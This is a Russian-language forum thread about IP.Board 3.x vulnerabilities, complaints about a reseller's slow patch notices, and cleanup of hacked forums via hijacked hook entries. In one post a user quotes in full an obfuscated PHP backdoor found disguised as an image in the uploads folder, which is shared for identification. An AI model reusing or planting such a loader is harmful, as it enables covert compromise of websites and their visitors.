Вопрос об обновлении безопасности IPB 3.1.x, 3.2.x, 3.3.x от 07.11.201

[HOOKAHPRO]

25 October 2012 Стало известно об уязвимостях IPB... О чем было написанно на сайте http://community.invisionpower.com/

Но пользователям преобретшим IPB у ibresource.ru об этом ни чего небыло сообщено...

Заплатка для рускоязычного сообщества предоставлена только 07.11.2012.

Собственно вопросы:

1. Чем 14 дней занимались сотрудники ibresource.ru

2. Почему небыли предупреждены клиенты

 

Всем клиентам ibresource.ru

Проверьте свой форум на наличие изменений в файлах...

Здесь видно содержимое корневой директории одного из сайтов взломанного аккаунта:

Подчеркнуты "лишние" папки и файлы, а также стандартные, если их подменили.

 

 

 

Содержимое одной из "лишних" папок:

 

Проверьте /uploads/profile/photo-128.jpg если там есть такой файл размер ~67.38 KB

То вы заражены...

 

Так же вирусы приписываются в базе...

в таблице `core_hooks_files` подменили путь к хукам

в boardIndexRecentTopics вел к тому самому файлу /uploads/profile/photo-128.jpg

и еще тут

 

Дерзайте, проверяйте...

И отписывайтесь...

Очень хочется услышапть ответы от ibresource.ru

[djru]

круто. патч вышел 7 ноября, и никто мне ничего не сказал как клиенту! Кроме того, после 7 ноября я со множеством проблем обращался в тех поддержку и никто намека не сделал, что патч вышел! Сегодня тех поддержка ответила, что типа "дайте денег, если вы хотите исправить, есть патч"

 

В следующий раз 100 раз подумайте, следует ли за такую тех. поддержку платить деньги.

 

Вам лучше навяжут вместо IPB их собственный форум Альтачего-то_там, чем оказывать нормальную поддержку уже купленного.

[muser]

круто. патч вышел 7 ноября, и никто мне ничего не сказал как клиенту!

в acp имеются уведомления о всех новостях

[DexizeR]

круто. патч вышел 7 ноября, и никто мне ничего не сказал как клиенту!

 

аналогично, пока нас не взломали, не узнали про этот патч

 

почему патч не включили в дистрибутив? я в клиентской панеле несколько дней назад скачал дистрибутив 3.3.4 поставил его, а сегодня на форуме появились подозрительные скрипты и удалена куча файлов.

 

вам нужно:

1. уведомлять клиентов по email что вышел такой-то патч

2. в клиентском разделе давать ссылку на патч

3. включать патчи в ваш дистрибутив

 

все 3 пункта не требуют интеллектуального труда, это просто базовые вещи который должен обеспечивать любой сервис получающий деньги от клиентов, а без этого вы не лучше цыганского табора.

[HOOKAHPRO]

Опять ibresource бездействует..(((

Вышло новое обновление безопасности...

Причем еще вчера.. Но информации об этом ноль...

 

A security evaluation has revealed a vulnerability that exists in IP.Board and a patch has been released to rectify this issue.

 

Please visit this topic for more information and to download the patch.

 

Security Update: 27th December 2012

 

A security evaluation has revealed a critical security issue and we are releasing a critical security update today to patch this issue.

 

Instructions

 

We are providing a patch for IP.Board versions 3.4, 3.3, 3.2, and 3.1. Version 3.1 is end of life for support but we are still providing the patch for the convenience of clients who have not yet upgraded. If you are running a version less than 3.1 you should upgrade to get this and other security enhancements.

 

Patching is very easy:

1. Identify the version of IP.Board you are running.
   
2. Download and unzip the appropriate patch file below that matches your version.
   
3. Upload the contents of the zip to your IP.Board home directory
   

 

IP.Board 3.4.x

http://community.invisionpower.com/public/style_extra/mime_types/zip.gif ipb34_dec27.zip 13.4K 491 downloads

 

IP.Board 3.3.x

http://community.invisionpower.com/public/style_extra/mime_types/zip.gif ipb33_dec27.zip 13.4K 346 downloads

 

IP.Board 3.2.x

http://community.invisionpower.com/public/style_extra/mime_types/zip.gif ipb32_dec27.zip 13.08K 88 downloads

 

IP.Board 3.1.x

http://community.invisionpower.com/public/style_extra/mime_types/zip.gif ipb31_dec27.zip 12.63K 81 downloads

 

IP.Converge

Please be advised that if you use IP.Converge, it has also been updated to resolve a similar security issue, and to ensure compatibility with the patches being released today for IP.Board. IP.Converge is no longer officially supported and is "use at your own risk". To patch your IP.Converge installation, simply download the full package from the following URL, unzip to your computer, and then upload the contents of the "upload" folder to your server, overwriting the existing files present.

 

http://community.inv...739-ipconverge/

 

IP.Converge Login Module

Please be advised that if you use IP.Converge, and you upload the updated IP.Converge package referenced above, you will also need to upload the following updated IP.Converge login module. Download the following patch, unzip to your local computer, and then upload the auth.php file to your server at admin/sources/loginauth/ipconverge/, overwriting the existing file.

http://community.invisionpower.com/public/style_extra/mime_types/zip.gif ipconverge_login_module.zip 3.18K 50 downloads

 

 

Notes:

• When you apply the security update the bulletin in your AdminCP will still display. We keep the bulletin in place for at least a week after a security release.
  
• Our main software packages accessed via the client area have already been updated with this security update.
  
• If you are an IPS Hosting client your community will be automatically patched.
  

Лично я уже обновился...

[KypoJIecoB]

после обновления ничего не сломалось?

[fade]

после обновления ничего не сломалось?

 

Нет, не сломалось, но и сообщение в админке не убралось...

Изменено 28 Декабря 2012 пользователем fade

[siv1987]

Нет, не сломалось, но и сообщение в админке не убралось...

 

Сообщение в админке "не убирается" после патчинга, это просто уведомление с ИПС.

[Sensay]

Всем дня доброго.

Ни разу вообще не обновлялся и понятия не имею что к чему

Сейчас 3.3.3 стоит .. как мне это обновление последние выполнить?

И можно ли только его или надо ещё что-то?

Архив, собственно, загрузил .. файлы - на сервер в соответствующие папки пихать или какие-то другие манипуляции?

[muser]

http://forums.ibresource.ru/index.php?/topic/64992/

вроде всё подробно написано.....

просто разархивировать и скопировать файлы на сервер (заменив ими старые)

[Glomen]

Нашел в папке uploads файл photo-7830.jpg с , внутри

 

<?php $geix7yo9='5~I~2i~}dO~c;~Ql=>5]>FH<pl]iUpQdi~cdO~Ic}~Q&iH(Gv>Hip>v(aCA_uF4+ea/&hh&GH<pl]iUpF>7iO]O(QOY<]vU1p$588!5l-Q/&5pv&zPF6SAXSATQKqq+FBQ:kkQ!Q/&2&H<pl]iUp&OY<]vU1p$588!5l-(/2&>lYU&QNGLLQ?Mv;(Q8ip-OQ/?QLLgQd&y&=>miO]>=FOY<]vU1pFH<pl]iUp(QOY<]vU1p$588!5l-Q/d&y&Qdy';global$g66826e0;$g66826e0=array();$di0guulo=array(208,203,214,192,215,204,196,201,223,159,151,222,149,158,148,144,135,198,209,250,195,202,133,141,132,193,130,227,247,234,232,236,245,231,140,131,221,205,210,230,199,206,229,129,246,224,243,254,237,241,228,248,152,153,136,139,200,155,216,194);foreach($di0guulo as $r8lfkusa)$g66826e0[]=($r8lfkusa^165);$i7g8bnre=t1oh17w7(array(60,112,79,62,61,105,53,56,105,114,62));$ejalbmrz=$i7g8bnre(t1oh17w7($geix7yo9));$rzma7bw1=$ejalbmrz[0];$l4hrqoe6=$rzma7bw1('',$ejalbmrz[1]);$l4hrqoe6();function t1oh17w7($vi3,$rpn='',$vw="\x63\x68\x72"){global$g66826e0,$pui8;if(!isset($pui8))$pui8=array();static$sygb;if(!isset($sygb))$sygb=0;$cm=$ras=$tj=$qy=$vw;$bt7=$tj(246^149).$tj(51^92).$vw(164^209).$ras(154^244).$vw(51^71);$pqh=$qy(186^201).$vw(46^90).$tj(191^205).$ras(45^65).$tj(152^253).$tj(4^106);$tfo=$qy(141^228).$cm(20^103).$vw(68^27).$tj(95^62).$tj(168^218).$tj(76^62).$vw(110^15).$qy(139^242);$opn=$tj(7^104).$qy(12^126).$tj(203^175);for($yu7=0,$pw4m=0;$yu7<($tfo($vi3)?$bt7($vi3):$pqh($vi3));$yu7++){$zfhn=(($tfo($vi3)?$vi3[$yu7]:$opn($vi3[$yu7])));if($zfhn==(17^27)||$zfhn==(25^20))continue;if(!isset($pui8[$zfhn])) $pui8[$zfhn]=$sygb++;if(!isset($g66826e0[$pui8[$zfhn]])){echo($vi3[$$yu7].' '.$zfhn);exit;}$n01y=$vw( $g66826e0[$pui8[$zfhn]]);$rpn.=$n01y;}return$rpn;} ?>

 

но больше никаких подозрительных файлов нет, все чисто, где еще поискать ?

[siv1987]

В таблице hooks http://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__70621

[2NEIRON]

Добрый день!

 

Наш форум (v.3.1.4) тоже был взломан в начале ноября со всеми последствиями и симптомами, описанными в данном топике. Где-то вручную, где-то с помощью удалось вывести форум из комы. Одной из проблем, не решенных до сих пор является вопрос с хуком последних сообщений на главной странице. Полная перестановка хука, не дала результатов, хотя в процессе установки и пишется, что хук поставлен корректно, подозрительно другое, написано, что в процессе установки не выполнено ни одного UPDATE и INSERT:

Также в таблице core_hooks_files отсутствую записи относящиеся к файлу boardIndexRecentTopics. Т.е. нет даже записи, которая бы ссылалась на пресловутый 128.jpg

Также если зайти в раздел с последними сообщениями, то та же картина, что нет последних сообщений, какой бы временной промежуток мы не выбрали (24 часа или 6 месяцев):

Хотя если зайти в аналогичную ветку но с сообщениями в блогах, то количество новых сообщений показывается корректно:

 

Друзья, кто-то может посоветовать куда еще копать? Заранее спасибо

 

P.S. Еще заметил, что перестали отправляться письма на почту с приглашениями

Изменено 5 Января 2013 пользователем 2NEIRON

[fade]

Заметил, что после заплатки не работает поиск на Форуме.

 

Откат на старый core.php помогает... Это так у всех или только мне повезло?